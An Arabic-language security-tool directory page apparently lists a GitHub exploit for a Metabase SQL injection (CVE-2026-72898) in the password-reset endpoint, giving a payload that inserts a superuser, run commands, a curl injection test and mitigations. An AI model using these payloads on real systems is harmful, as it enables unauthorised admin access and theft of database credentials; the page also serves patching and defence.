Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/34zy/cve-2026-72898
ماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالأمن الويباختبار الاختراقالفريق الأحمرأمن قواعد البيانات
GitHub34zy/cve-2026-72898

CVE-2026-72898

استغلال Python للثغرة CVE-2026-72898، وهي حقن SQL غير مُصادَق عليه في نقطة نهاية إعادة تعيين كلمة المرور في Metabase، مما يؤدي إلى إنشاء حسابات مسؤول واستخراج بيانات اعتماد قاعدة البيانات.

منذ 6س 12دلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حقن SQL عن بُعد لتنفيذ الأوامر في Metabase

CVSS 10.0 CRITICAL EXPLOITED NO AUTH

Exploitation Demo

حقن SQL بدون مصادقة في نقطة النهاية /api/session/reset_password في Metabase. ينشئ حسابات مسؤول ويستخرج بيانات اعتماد قاعدة البيانات.

المتأثر: v58.0 - v63.3 | المُصحَّح: v58.24+، v59.21+، v60.17+، v61.11+، v62.9+، v63.5+


البدء السريع

root@kitploit:~
pip install flask requests
python3 CVE-2026-72898.py http://localhost:5000 --check

الثغرة

دمج النصوص في استعلام SQL:

root@kitploit:~
# Vulnerable code
query = f"SELECT * FROM core_user WHERE email='{email}'"

حمولة الهجوم:

root@kitploit:~
'; INSERT INTO core_user (email, password, is_superuser) VALUES ('admin@hack', 'hash', 1); --

الاستخدام

الفحص فقط (بدون تعديل):

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 --check

الاستغلال الكامل:

root@kitploit:~
python3 CVE-2026-72898.py http://localhost:5000 -e [email protected] -p Password123!

الاختبار اليدوي:

root@kitploit:~
# Verify endpoint
curl http://localhost:5000/api/health

# Test SQLi
curl -X POST http://localhost:5000/api/session/reset_password \
  -H "Content-Type: application/json" \
  -d '{"email": "'"'"' OR '"'"'1'"'"'='"'"'1"}'

ما الذي يفعله

  1. يكتشف نسخة Metabase (حقن SQL قائم على القيم المنطقية)
  2. ينشئ مستخدم مسؤول عبر حقن SQL
  3. يصادق باستخدام المسؤول الجديد
  4. يستخرج بيانات اعتماد قاعدة البيانات المتصلة
  5. يتحقق من الاختراق الكامل للنظام

التأثير

  • وصول غير مصرح به كمسؤول
  • استخراج بيانات اعتماد قاعدة البيانات
  • اختراق قاعدة البيانات المتصلة
  • تحكم كامل في التطبيق

التخفيف

الآن:

  • الترقية إلى النسخة المُصحَّحة
  • حظر /api/session/reset_password عبر WAF
  • تدقيق حسابات المسؤولين بحثًا عن إضافات غير مصرح بها
  • تدوير جميع بيانات اعتماد قاعدة البيانات

لاحقًا:

  • استخدام الاستعلامات المُعاملة (parameterized queries)
  • إضافة التحقق من المدخلات
  • تطبيق المصادقة على جميع نقاط النهاية الحساسة
  • تمكين تسجيل استعلامات SQL

الروابط

  • GitHub Advisory
  • NVD CVE Entry

للاستخدام المصرح به فقط. الوصول غير المصرح به غير قانوني.

تنزيل الأداة